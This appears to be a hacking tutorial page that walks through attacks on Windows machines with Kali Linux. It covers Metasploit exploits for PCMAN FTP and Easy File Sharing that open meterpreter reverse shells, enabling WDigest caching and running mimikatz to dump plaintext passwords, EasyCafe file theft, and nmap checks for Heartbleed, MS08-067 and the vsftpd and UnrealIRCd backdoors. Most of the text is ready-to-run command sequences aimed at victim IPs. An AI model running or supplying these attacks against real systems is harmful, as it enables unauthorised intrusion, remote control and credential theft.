Hack Remote Windows PC using PCMAN FTP Server Buffer Overflow - PUT Command

This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous credentials are enabled...

Exploit Targets

PCMAN FTP v2.0.7 Server

Requirement

Attacker: kali Linux

Victim PC: Windows XP SP 3

Most Easy File Sharing FTP Server run on port 21 so in order to discover information regarding the PCMan FTP Server we need to execute the following script:

Nmap  -sV 192.168.0.127

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/pcman_put

msf exploit (pcman_put)>set payload windows/meterpreter/reverse_tcp

msf exploit (pcman_put)>)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (pcman_put)>)>set rhost 192.168.0.127

msf exploit (pcman_put)>)>set port 21

msf exploit (pcman_put)>)>exploit  

Hack Remote Windows PC using Easy File Sharing HTTP Server 7.2 SEH Overflow

This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software

Exploit Targets

Easy File Sharing FTP Server 7.2

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Most Easy File Sharing FTP Server run on port 80 or 8080 so in order to discover information regarding the Easy File Sharing FTP Server we need to execute the following script:

Nmap  -sV 192.168.0.103

Open Kali terminal type msfconsole

Now type use exploit/windows/http/easyfilesharing_seh

msf exploit (easyfilesharing_seh)>set payload windows/meterpreter/reverse_tcp

msf exploit (easyfilesharing_seh)>set lhost 192.168.0.119 (IP of Local Host)

msf exploit (easyfilesharing_seh)>set rhost 192.168.0.103

msf exploit (easyfilesharing_seh)>set rport 8080

msf exploit (easyfilesharing_seh)>exploit  

Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit

On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory.

Exploit Targets

Windows 10

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use post/windows/manage/wdigest_caching

msf exploit (wdigest_caching)>set session 1

msf exploit (wdigest_caching)>exploit

 To send mimikatz file to the target system using following command

Upload /usr/share/mimikatz/x64/mimikatz.exe e:\\

Type the following command to check privilege

privilege::debug

Then type the following command to get users passwords in text mode.

sekurlsa::logonPassword

Finding Vulnerability in EasyCafe Server using Metasploit

This module exploits file retrieval vulnerability in EasyCafe Server. The vulnerability can be triggered by sending a specially crafted packet (opcode 0x43) to the 831/TCP port. This module has been successfully tested on EasyCafe Server version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 and Windows 7 SP1. Note that the server will throw a popup messagebox if the specified file does not exist.

Exploit Targets

EasyCafe Server version 2.2.14

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/misc/easycafe_server_fileaccess

msf exploit (easycafe_server_fileaccess)>set rhosts 192.168.0.103

msf exploit (easycafe_server_fileaccess)>set rport 831

msf exploit (easycafe_server_fileaccess)>exploit

The result will be saved on /root/.msf4/ directory

Finding Vulnerability in Server/Client using Nmap

Heartbleed bug

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected by the SSL/TLS encryption used to secure the Internet.  

Open terminal in kali

nmap --script=ssl-heartbleed 192.168.0.114

Check the output from Nmap to see whether the server is vulnerable or not

Poodle Bug

The POODLE attack is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0.  -“Wikipedia”.

Open terminal in kali

nmap  --script  ssl-poodle 192.168.0.114

IRC Backdoor

Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond. This script can be used to run an arbitrary command on the remote system. 

Open terminal in kali

nmap -sV --script=irc-unrealircd-backdoor  -p 6667 192.168.1.6

 MS08-67 Vulnerability

Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.

Open terminal in kali

nmap  --script  smb-vuln-ms08-067  -p 445  192.168.0.114

RDP Vulnerability

Checks if a machine is vulnerable to MS12-020. RDP vulnerability addresses a denial of service vulnerability inside Terminal Server.

  

nmap -sV --script=rdp-ms12-020  -p 3389 192.168.0.114

Vsftpd Backdoor

Tests for the presence of the vsFTPd 2.3.4 backdoor reported CVE-2011-2523. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.

nmap --script ftp-vsftpd-backdoor  -p 21  192.168.1.6

For More Info visit here .